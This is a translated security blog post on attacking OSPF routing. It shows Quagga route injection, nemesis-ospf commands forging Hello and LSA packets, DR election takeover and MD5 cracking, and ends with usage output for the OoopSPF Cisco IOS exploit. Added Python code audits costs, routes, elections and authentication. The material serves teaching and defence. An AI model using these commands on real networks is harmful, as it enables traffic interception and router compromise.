Environments with the OSPF protocol.

Oleg Petukhov, lawyer in the field of international law and personal data protection, information security specialist, protection of information and personal data.
Telegram channel: https://t.me/protectioninformation Telegram Group: https://t.me/informationprotection1 Website: https://legascom.ru Email: online@legascom.ru #informationprotection #informationsecurity
The OSPF (Open Shortest Path First) routing protocol is best suited for large, dynamic, interconnected IP networks with multiple paths. As a rule, the OSPF routing protocol is used for routing in corporate networks containing an average of 50 local area networks and several thousand hosts.
For a better understanding, let's compare RIP and OSPF.
OSPF is a link-state protocol, unlike RIP, which is a distance-vector protocol: in RIP, each router updates its routing table based on the distance vectors it receives from its neighbors.
With a link-state protocol, the router does not exchange distance information with its neighbors. Instead, each router actively checks the state of its links to each neighboring router and floods this information to its other neighbors, which pass it on throughout the autonomous system. Every router thus receives the link-state information of every other router and builds a complete routing table from it.
In the network shown in the figure, the route through the two red routers is considered optimal between Source and Destination, because the links on that route are faster.
From a practical point of view, the main difference is that a link-state protocol reacts to changes much faster than a distance-vector protocol, so network convergence is much faster. Convergence refers to the network stabilizing after a change such as a router failure or a link failure.
OSPF also differs from RIP (and from many other routing protocols) in that it runs directly over IP, not over UDP or TCP: OSPF has its own protocol number (89), which is set in the protocol field of the IP header.
Accordingly, attacks on OSPF are more complex than on RIP. The main difficulties are as follows:
1) the attacker's router must emulate HELLO packets in order to exchange routing information with other routers;
2) dependence on the hierarchy of routers involved in the OSPF exchange: the routers taking part may sit at different levels of the hierarchical routing scheme.
Taking these difficulties into account, we will proceed to consider the main attacks on OSPF.
The purpose of the first attack is to present the route that passes through the attacker's machine as the one with the highest throughput. One of the criteria for choosing the optimal route in OSPF is a metric (cost) calculated using the formula
metric = reference bandwidth / link bandwidth,
where reference bandwidth = 10^8 bit/s (100 Mbps) by default and link bandwidth is the bandwidth of the link.
For example, for channels with 100 Mbps, the metric value is 1, for 10 Mbps – 10, and so on.
Thus, the attacker needs to advertise a metric of 1 for his route in order to make it the preferred one.
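As an added illustration (not code from the original post), the cost formula above, the SPF computation that consumes it, and the check a defender can run against it: an honest topology where the attacker's host sits on a slow 10 Mbit/s port, the same link-state database after that host advertises cost 1, and an audit that compares every advertised cost with the cost the documented link speed would justify. The topology, router names and link speeds are constructed for the example.

```python
import heapq

# Default OSPF reference bandwidth: 10^8 bit/s, so a 100 Mbit/s link costs 1.
REF_BW_BPS = 10**8


def ospf_cost(link_bps, ref_bps=REF_BW_BPS):
    """Interface cost = reference bandwidth / link bandwidth, as an integer >= 1."""
    if link_bps <= 0:
        raise ValueError("link bandwidth must be positive")
    return max(1, ref_bps // link_bps)


def shortest_path(lsdb, src, dst):
    """Dijkstra over a link-state database given as {(from, to): cost}.
    Returns (total_cost, path) or (None, []) if dst is unreachable."""
    adj = {}
    for (a, b), cost in lsdb.items():
        adj.setdefault(a, []).append((b, cost))
    dist, prev, heap = {src: 0}, {}, [(0, src)]
    while heap:
        d, node = heapq.heappop(heap)
        if d > dist.get(node, float("inf")):
            continue  # stale heap entry
        if node == dst:
            break
        for nxt, cost in adj.get(node, []):
            nd = d + cost
            if nd < dist.get(nxt, float("inf")):
                dist[nxt], prev[nxt] = nd, node
                heapq.heappush(heap, (nd, nxt))
    if dst not in dist:
        return None, []
    path = [dst]
    while path[-1] != src:
        path.append(prev[path[-1]])
    return dist[dst], path[::-1]


def audit_costs(lsdb, inventory_bps, ref_bps=REF_BW_BPS):
    """Compare advertised costs with the cost implied by the documented link speed.
    A cost lower than the physical link justifies, or a link nobody documented,
    is exactly what a metric-forging router produces."""
    findings = []
    for link, cost in lsdb.items():
        if link not in inventory_bps:
            findings.append((link, cost, None, "link not in inventory"))
        else:
            expected = ospf_cost(inventory_bps[link], ref_bps)
            if cost < expected:
                findings.append((link, cost, expected, "advertised cost below expected"))
    return findings


# Constructed sample topology (not from the post). The legitimate path R1-R2-R3-R5
# is 100 Mbit/s end to end; the attacker A hangs off a 10 Mbit/s port on R1.
LINK_INVENTORY_BPS = {
    ("R1", "R2"): 100_000_000,
    ("R2", "R3"): 100_000_000,
    ("R3", "R5"): 100_000_000,
    ("R1", "A"): 10_000_000,
}
# Link-state database as the honest routers advertise it.
LEGIT_LSDB = {link: ospf_cost(bps) for link, bps in LINK_INVENTORY_BPS.items()}
# Same database after A advertises cost 1 on its slow link and on an
# undocumented link towards R5.
FORGED_LSDB = {**LEGIT_LSDB, ("R1", "A"): 1, ("A", "R5"): 1}


if __name__ == "__main__":
    print("legit :", shortest_path(LEGIT_LSDB, "R1", "R5"))
    print("forged:", shortest_path(FORGED_LSDB, "R1", "R5"))
    for finding in audit_costs(FORGED_LSDB, LINK_INVENTORY_BPS):
        print("finding:", finding)
```

With the honest database the best path is R1-R2-R3-R5 at cost 3; with the forged costs it becomes R1-A-R5 at cost 2, and the audit reports both the under-costed link and the link that no inventory knows about. The inventory is the thing a defender has and a router does not: OSPF trusts whatever cost an adjacent router advertises, so the check has to come from outside the protocol.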
!
! Zebra configuration saved from vty
! 2005/08/16 01:22:41
!
hostname legitimate.ospfd
password 8 p@ssw0rd
enable password 8 Cb/yfFsI.abqs
log file /var/log/quagga/ospfd.log
service advanced-vty
service password-encryption
!
!
interface eth0
description DMZ_Network
ip ospf authentication message-digest
ip ospf message-digest-key 1 md5 secret_key
!
interface eth1
!
interface lo
!
interface tun10
!
router ospf
ospf router-id 192.168.20.111
redistribute kernel
redistribute connected
network 192.168.20.0/24 area 0.0.0.0
area 0.0.0.0 authentication message-digest
!
line vty
exec-timeout 30 0
!
Once the router has successfully joined the OSPF route exchange, check the current state of the routing information with the show ip ospf command:
legitimate.ospfd# show ip ospf
OSPF Routing Process, Router ID: 192.168.20.111
Supports only single TOS (TOS0) routes
This implementation conforms to RFC2328
RFC1583Compatibility flag is disabled
OpaqueCapability flag is disabled
SPF schedule delay 1 secs, Hold time between two SPFs 1 secs
Refresh timer 10 secs
This router is an ASBR (injecting external routing information)
Number of external LSA 4. Checksum Sum 0x00025f81
Number of opaque AS LSA 0. Checksum Sum 0x00000000
Number of areas attached to this router: 1
Area ID: 0.0.0.0 (Backbone)
Number of interfaces in this area: Total: 1, Active: 1
Number of fully adjacent neighbors in this area: 2
Area has message digest authentication
SPF algorithm executed 29 times
Number of LSA 9
Number of router LSA 4. Checksum Sum 0x00025166
Number of network LSA 1. Checksum Sum 0xffff90fa
Number of summary LSA 2. Checksum Sum 0x000166c2
Number of ASBR summary LSA 2. Checksum Sum 0x00014713
Number of NSSA LSA 0. Checksum Sum 0x00000000
Number of opaque link LSA 0. Checksum Sum 0x00000000
Number of opaque area LSA 0. Checksum Sum 0x00000000
Next, add the appropriate routes:
kali / # ip route add 64.100.0.0/14 dev eth0
kali / # ip route add 128.107.0.0/16 dev eth0
Make sure that these routes have been successfully added to the OSPF exchange:
legitimate.ospfd# sh ip ospf route
============ OSPF external routing table ===========
N E2 64.100.0.0/14 [10/20] tag: 0
via 192.168.66.111, eth0
N E2 128.107.0.0/16 [10/20] tag: 0
via 192.168.66.111, eth0
As you have probably guessed, 192.168.66.111 is the attacker's machine.
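What the output above looks like from the defender's side, as an added example that is not part of the original post: a parser for the "OSPF external routing table" section of Quagga's show ip ospf route, followed by a check that flags any external (E1/E2) route whose next hop is not one of the routers allowed to act as ASBR, or whose prefix lies outside the ranges that ASBR is permitted to redistribute. The sample output is constructed in Quagga's format, and the trusted-ASBR address 192.168.20.1 and the allowed range 10.200.0.0/16 are assumptions for the example.

```python
import ipaddress
import re

# Route line, e.g. "N E2 64.100.0.0/14 [10/20] tag: 0"
ROUTE_RE = re.compile(r"^N\s+(E1|E2)\s+(\S+/\d+)\s+\[(\d+)/(\d+)\]\s+tag:\s*(\d+)")
# Next-hop line, e.g. "via 192.168.66.111, eth0"
VIA_RE = re.compile(r"^\s*via\s+(\S+),\s*(\S+)")


def parse_external_routes(text):
    """Parse the 'OSPF external routing table' section of `show ip ospf route`."""
    routes, current = [], None
    for line in text.splitlines():
        m = ROUTE_RE.match(line.strip())
        if m:
            current = {
                "type": m.group(1), "prefix": m.group(2),
                "cost": int(m.group(3)), "ext_cost": int(m.group(4)),
                "tag": int(m.group(5)), "via": [],
            }
            routes.append(current)
        elif current is not None:
            m = VIA_RE.match(line)
            if m:
                current["via"].append((m.group(1), m.group(2)))
    return routes


def unexpected_externals(routes, trusted_asbrs, allowed_prefixes):
    """Flag external routes whose next hop is not a known ASBR, or whose prefix
    is not inside a range the ASBRs are allowed to redistribute."""
    allowed = [ipaddress.ip_network(p) for p in allowed_prefixes]
    findings = []
    for r in routes:
        net = ipaddress.ip_network(r["prefix"])
        reasons = []
        for nexthop, _ifname in r["via"]:
            if nexthop not in trusted_asbrs:
                reasons.append(f"next hop {nexthop} is not a known ASBR")
        if not any(net.subnet_of(a) for a in allowed):
            reasons.append("prefix outside allowed external ranges")
        if reasons:
            findings.append((r["prefix"], reasons))
    return findings


# Constructed sample output in Quagga's format (not a capture from the post):
# one external route from the real ASBR and two appearing via an unknown host.
SAMPLE_OUTPUT = """\
============ OSPF external routing table ===========
N E2 10.200.0.0/16           [10/20] tag: 0
                           via 192.168.20.1, eth0
N E2 64.100.0.0/14           [10/20] tag: 0
                           via 192.168.66.111, eth0
N E2 128.107.0.0/16          [10/20] tag: 0
                           via 192.168.66.111, eth0
"""
TRUSTED_ASBRS = {"192.168.20.1"}       # assumed: the only legitimate ASBR
ALLOWED_EXTERNAL = ["10.200.0.0/16"]   # assumed: ranges it may redistribute


if __name__ == "__main__":
    routes = parse_external_routes(SAMPLE_OUTPUT)
    for prefix, reasons in unexpected_externals(routes, TRUSTED_ASBRS, ALLOWED_EXTERNAL):
        print(prefix, "->", "; ".join(reasons))
```

Run periodically against the live output, the two 64.100.0.0/14 and 128.107.0.0/16 entries surface immediately: an E2 route is learned from a host that nobody configured as an ASBR, for prefixes no ASBR is allowed to inject. The same idea applies at the source: redistribute kernel and redistribute connected in the Quagga config above are what turn any route added with ip route into an OSPF external, so they belong only on routers that are meant to be ASBRs.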
To implement this attack, you can also use the Nemesis utility mentioned earlier, or rather its module designed specifically for working with OSPF. Here is the list of options for this utility:
kali / # ./nemesis-ospf
OSPF Packet Injection -=The NEMESIS Project 1.1
(C) 1999, 2000 obecian <obecian@celerity.bartoli.org>
OSPF usage:
./nemesis-ospf [-v] [optlist]
OSPF Packet Types:
-p <OSPF Protocol>
-pH HELLO, -pD DBD, -pL LSR, -pU LSU, -pR LSA (router),
-pN LSA (network), -pM LSA (summary), -pA LSA (AS)
OSPF HELLO options:
-N <Neighbor Router Address>
-i <Dead Router Interval>
-l <OSPF Interval>
OSPF DBD options:
-z <MAX DGRAM Length>
-x <Exchange Type>
OSPF LSU options:
-B <num of LSAs to bcast>
OSPF LSA related options:
-L <router id>
-G <LSA age>
OSPF LSA_RTR options:
-u <LSA_RTR num>
-y <LSA_RTR router type>
-k <LSA_RTR router data>
OSPF LSA_AS_EXT options:
-f <LSA_AS_EXT forward address>
-g <LSA_AS_EXT tag>
OSPF options:
-m <OSPF Metric>
-s <Sequence Number>
-r <Advertising Router Address>
-n <OSPF Netmask>
-O <OSPF Options>
-R <OSPF Router id>
-A <OSPF Area id>
-P <Payload File (Binary or ASCII)>
(-v VERBOSE packet struct to stdout)
IP Options
-S <Source Address>
-D <Destination Address>
-I <IP ID>
-T <IP TTL>
-t <IP/OSPF tos>
-F <IP frag>
-o <IP Options>
Data Link Options:
-d <Ethernet Device>
-H <Source MAC Address>
-M <Destination MAC Address>
You must specify the source, the destination, the protocol, and the corresponding options. For example, to send a fake OSPF Neighbor Hello packet to the router, you need to run the following command:
Kali / # ./nemesis-ospf -v -pH -N 128.107.0.1
An alternative implementation of this attack may be the generation of fake OSPF LSA updates, which can also be carried out using nemesis.
Kali / # ./nemesis-ospf -v -pR LSA 128.107.0.1
Becoming the Designated or Backup Designated OSPF router.
In medium and large networks using OSPF, a hierarchy of routers is used. In large networks with dozens or even hundreds of routers, keeping routing information up to date is very resource-intensive, so a hierarchy is used to divide the work of building routing tables and reduce the load on devices. At the top of such a hierarchy is, as a rule, the most capable router, called the Designated Router (DR). Its purpose is to efficiently distribute up-to-date routing information to all routers taking part in the OSPF exchange.
If the Designated Router fails, it is replaced by the Backup Designated Router (BDR), that is, a standby top-level router.
The designated router is selected by voting based on the priority of the router and its IP address.
An attacker may try to become this designated router.
If the DR is assigned priority 255 and the BDR priority 254, it is impossible to win the election. However, many administrators do not use the maximum priority values, assigning the DR and BDR 100 and 10, or 2 and 1, respectively. Sometimes the DR and BDR are simply the routers with the highest IP addresses.
Thus, in order for an attacker to make his router the designated one, it is enough to establish how the DR is selected and, based on this, fake either the priority or the IP address.
In Quagga, you can set the priority using the following command:
ip ospf priority 255
If DR and BDR have maximum priority values, you can try to disable them using various network attacks described in this book, and then try to substitute your fake router.
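To make the election rules concrete, here is an added example (my code, not from the original post) that models the DR/BDR election of RFC 2328 section 9.4 in simplified form and uses it as an audit: given the routers seen on a segment, their priorities and the roles they currently declare, it reports whenever the election would put someone other than the intended devices into the DR or BDR role. The router IDs, priorities and the "expected" roles are constructed for the example; the attacker address reuses the 192.168.66.111 host from the post.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Router:
    rid: str       # Router ID (dotted quad)
    priority: int  # 0..255; 0 means never eligible


def rid_key(rid):
    """Numeric order for dotted-quad Router IDs, the election tie-breaker."""
    return tuple(int(octet) for octet in rid.split("."))


def _best(candidates):
    """Highest priority wins; equal priority goes to the highest Router ID."""
    return max(candidates, key=lambda r: (r.priority, rid_key(r.rid)), default=None)


def elect(routers, current_dr=None, current_bdr=None):
    """Simplified DR/BDR election after RFC 2328 section 9.4.
    `current_dr`/`current_bdr` are the Router IDs the segment's routers currently
    declare in their Hellos (None on a freshly initialised segment). An incumbent
    keeps its role as long as it stays eligible: the election is not preemptive."""
    eligible = [r for r in routers if r.priority > 0]
    # Step 1: BDR is chosen among routers not declaring themselves DR,
    # preferring those that already declare themselves BDR.
    not_dr = [r for r in eligible if r.rid != current_dr]
    bdr = _best([r for r in not_dr if r.rid == current_bdr]) or _best(not_dr)
    # Step 2: DR is the router declaring itself DR; if there is none, the BDR
    # is promoted and the BDR election is repeated without it.
    dr = _best([r for r in eligible if r.rid == current_dr])
    if dr is None:
        dr = bdr
        bdr = _best([r for r in not_dr if dr is None or r.rid != dr.rid])
    return dr, bdr


def audit_segment(routers, current_dr, current_bdr, expected_dr, expected_bdr):
    """Findings when the election outcome differs from the devices that are
    supposed to hold the DR and BDR roles on this segment."""
    dr, bdr = elect(routers, current_dr, current_bdr)
    findings = []
    if dr is None or dr.rid != expected_dr:
        findings.append(f"DR is {dr.rid if dr else None}, expected {expected_dr}")
    if bdr is None or bdr.rid != expected_bdr:
        findings.append(f"BDR is {bdr.rid if bdr else None}, expected {expected_bdr}")
    return findings


# Constructed sample segment: weak priorities as many administrators set them,
# plus an unknown host claiming the maximum priority.
LEGIT_WEAK = [Router("10.0.0.1", 2), Router("10.0.0.2", 1), Router("10.0.0.3", 1)]
ATTACKER = Router("192.168.66.111", 255)


if __name__ == "__main__":
    # Fresh election (e.g. after the segment's routers restarted): the intruder wins.
    print("fresh     :", elect(LEGIT_WEAK + [ATTACKER]))
    # Running segment with incumbents: the intruder cannot preempt them.
    print("incumbents:", elect(LEGIT_WEAK + [ATTACKER], "10.0.0.1", "10.0.0.2"))
    print("audit     :", audit_segment(LEGIT_WEAK + [ATTACKER], None, None,
                                       "10.0.0.1", "10.0.0.2"))
```

Two points the model makes visible. First, as the post says, with weak priorities any newcomer claiming 255 wins a fresh election outright, and because equal priorities are broken by Router ID, a priority alone is never a hard guarantee in that situation. Second, on a running segment the election is non-preemptive: the incumbents keep their roles no matter what the newcomer claims, which is why the post's note about first taking the DR and BDR down matters, and why a DR or BDR going down and coming back with a different address is worth alerting on. Feeding the audit from show ip ospf neighbor on each segment, with priority 0 on interfaces that should never host a DR, catches the change early.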
Hacking OSPF MD5.
For protection, the OSPF protocol uses MD5 authentication. Accordingly, by analogy with hacking MD5 in the RIP protocol, this protection can be hacked here as well.
This requires Cain & Abel. The hacking process itself is similar to the one described in the posts on RIP hacking, so we will not describe it again here.
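For readers who want to see what this MD5 protection actually checks, here is an added example (my code, not from the original post) of the receiver side: an OSPFv2 packet with cryptographic authentication as laid out in RFC 2328 Appendix D, where the 16-byte digest appended after the packet is MD5 over the packet followed by the zero-padded shared key, and a verifier that rejects a wrong or tampered digest and, using the cryptographic sequence number in the authentication field, a replayed older packet. The packet body and sequence numbers are constructed; the key secret_key and key ID 1 are taken from the Quagga configuration shown earlier.

```python
import hashlib
import hmac
import struct

OSPF_VERSION = 2
AUTH_TYPE_CRYPTOGRAPHIC = 2
HEADER_LEN = 24   # 16-byte fixed header + 8-byte authentication field
DIGEST_LEN = 16


def _dotted(addr):
    return bytes(int(o) for o in addr.split("."))


def pad_key(key):
    """Keys shorter than 16 bytes are zero-padded before hashing."""
    if len(key) > 16:
        raise ValueError("OSPF MD5 keys are at most 16 bytes")
    return key.ljust(16, b"\x00")


def build_ospf_packet(ptype, router_id, area_id, key_id, seqnum, body, key):
    """OSPFv2 packet with cryptographic authentication: the checksum field is
    zero, the auth field carries key ID, digest length and sequence number, and
    MD5(packet || padded key) is appended after the packet (RFC 2328 D.4.3)."""
    length = HEADER_LEN + len(body)
    auth_field = struct.pack("!HBBI", 0, key_id, DIGEST_LEN, seqnum)
    header = struct.pack("!BBH4s4sHH", OSPF_VERSION, ptype, length,
                         _dotted(router_id), _dotted(area_id), 0,
                         AUTH_TYPE_CRYPTOGRAPHIC) + auth_field
    packet = header + body
    return packet + hashlib.md5(packet + pad_key(key)).digest()


class OspfAuthVerifier:
    """Receiver-side check: the digest must match a configured key, and the
    cryptographic sequence number must not go backwards per neighbour."""

    def __init__(self, keys):
        self.keys = keys      # {key_id: key bytes}
        self.last_seq = {}    # neighbour Router ID -> last accepted sequence number

    def verify(self, datagram):
        if len(datagram) < HEADER_LEN + DIGEST_LEN:
            return False, "truncated"
        version, _ptype, length, rid, _aid, _cksum, autype = struct.unpack(
            "!BBH4s4sHH", datagram[:16])
        if version != OSPF_VERSION or autype != AUTH_TYPE_CRYPTOGRAPHIC:
            return False, "not OSPFv2 cryptographic authentication"
        _, key_id, digest_len, seqnum = struct.unpack("!HBBI", datagram[16:24])
        if digest_len != DIGEST_LEN or len(datagram) != length + DIGEST_LEN:
            return False, "bad length"
        key = self.keys.get(key_id)
        if key is None:
            return False, f"unknown key id {key_id}"
        expected = hashlib.md5(datagram[:length] + pad_key(key)).digest()
        if not hmac.compare_digest(expected, datagram[length:]):
            return False, "digest mismatch"
        if seqnum < self.last_seq.get(rid, 0):
            return False, "replay: sequence number went backwards"
        self.last_seq[rid] = seqnum
        return True, "ok"


# Constructed sample: Hello-type packets (type 1) whose body content is irrelevant
# to the check, key ID 1 with the key from the post's config, increasing sequence.
SHARED_KEY = b"secret_key"
VERIFIER_KEYS = {1: SHARED_KEY}
HELLO_BODY = b"\x00" * 20


def demo():
    verifier = OspfAuthVerifier(VERIFIER_KEYS)
    p1 = build_ospf_packet(1, "192.168.20.111", "0.0.0.0", 1, 100, HELLO_BODY, SHARED_KEY)
    p2 = build_ospf_packet(1, "192.168.20.111", "0.0.0.0", 1, 101, HELLO_BODY, SHARED_KEY)
    results = [verifier.verify(p1), verifier.verify(p2)]
    results.append(verifier.verify(p1))  # replay of the older, still valid packet
    wrong_key = build_ospf_packet(1, "192.168.20.111", "0.0.0.0", 1, 102,
                                  HELLO_BODY, b"guess")
    results.append(verifier.verify(wrong_key))
    tampered = p2[:30] + bytes([p2[30] ^ 0xFF]) + p2[31:]  # flip one body byte
    results.append(verifier.verify(tampered))
    return results
```

The demo returns ok for the two genuine packets, a replay rejection for the re-sent first packet, and digest mismatches for the packet built with a guessed key and for the one modified in transit. It also shows why the scheme is only as strong as the key: the digest is a plain keyed hash over material an on-path observer sees in full, so a short or dictionary key is what the cracking the post mentions exploits. Where the routers support it, RFC 5709 HMAC-SHA authentication, long random keys, and key rotation via multiple key IDs are the corresponding hardening.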
An attack on OSPF using the OoopSPF exploit.
Cisco routers running IOS versions 11.2, 11.3 and 12.0 are subject to a buffer overflow when receiving a large number of OSPF HELLO packets. A proof of concept for this vulnerability is presented on the official website:
arhontus / # perl IOStack.pl -d 192.168.66.202 -p ****** -e ****** -r stackdump
***********************************************************************
IOSSTRING: IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.3(6),
RELEASE SOFTWARE (fc3)
IMAGE: flash:c2600-ik9o3s3-mz.123-6.bin
MEMORY: 61440K/4096K
ARRAY: 82A7E210
PID RECORD STACK RETURNA RETURNV NAME
<skip>
90 830CFF04 831FCD80 831fcd84 80446D50 OSPF Hello
150 82D290A8 831FFCA0 831ffca4 80446D50 OSPF Router
<skip>
arhontus / # ./OoopSPF
Phenoelit OoopSPF
Cisco IOS OSPF remote exploit (11.2.-12.0)
(C) 2002/2003 FX of Phenoelit <fx@phenoelit.de>
Usage:
./OoopSPF -s <src net> -n <src mask> -d <target rtr ip> -f <file> -t <targ#>
Options:
-s <src net> Use this network as source (as in target config)
-n <src mask> Use this netmask as source (as in target config)
-d <target> This is the target router interface IP
-f <file> Use this as the new config for the router
-t # Use this target value set (see below)
-a <area> Use this OSPF area
-v Be verbose (-vv or -vvv recommended)
-D Directed attack (unicast) for 11.x targets
-T Test only - don't send
--- barely used options ---
-L # Number of neighbors to announce (overflow size)
-F # Start of data (seen reverse to overflow)
-S # NOP sled
In the next post, we will move on to the security issues of the OSPF routing protocol.